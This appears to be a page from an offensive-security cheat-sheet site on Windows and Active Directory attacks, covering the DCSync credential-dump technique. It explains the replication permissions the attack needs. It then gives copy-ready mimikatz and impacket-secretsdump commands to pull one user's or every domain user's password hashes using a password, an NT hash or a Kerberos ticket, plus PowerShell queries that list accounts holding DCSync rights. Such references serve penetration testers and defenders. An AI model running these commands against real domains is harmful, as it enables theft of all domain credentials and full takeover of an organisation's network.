SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Domain Privesc #Credentials Dump #DCSync

Credentials dump using DCSync attack

Requirements:

  • Current user needs DCSync permissions (see below) on a Domain Object granted. Domain Admins, Enterprise Admins, Administrators and Domain Controllers groups have the required permissions by default.
  • Access to LDAP service on DC.

A DCSync attack exploits a legitimate function of Active Directory to steal password data from Domain Controller database. The DCSync simulates the behavior of a Domain Controller and asks other DC to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR) and its GetNCChanges function. In response a DC returns the replication data that includes password hashes. Most often, the place from which DCSync is executed is not restricted, so you just need to have the right user.

Required DCSync permissions on the Domain Object:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes In Filtered Set

Windows:

WARNING: It assumes that you are the user who has DCSync permissions and you have valid TGT or TGS for DC LDAP service in memory. It might be required to become someone else (e.g. domain admin) using Delegation Abuse, Pass-the-Ticket or RunAs techniques.

.\mimikatz.exe
 
# Get a single domain user password hash
> lsadump::dcsync /domain:$domain /user:$user
 
# Get all domain users password hashes
> lsadump::dcsync /domain:$domain /all

Linux:

# DCSync using password
impacket-secretsdump -just-dc $domain/$user:$pass@$dc_ip
 
# DCSync using NT hash
impacket-secretsdump -hashes :$nt_hash -just-dc $domain/$user@$host
 
# DCSync using Kerberos TGT
export KRB5CCNAME=$tgt_ccache_file
impacket-secretsdump $hostname -k -no-pass -dc-ip $dc_ip -just-dc

Enumerate users or groups with DCSync permissions

Active Directory module:

(Get-Acl "ad:\dc=$domain_p2,dc=$domain_p1").Access | ? {($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) } | select IdentityReference

PowerView module:

Get-ObjectACL "DC=$domain_p2,DC=$domain_p1" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} | select SecurityIdentifier,@{n="Identity";e={Convert-SidToName $_.SecurityIdentifier}}

References

Children

DCSync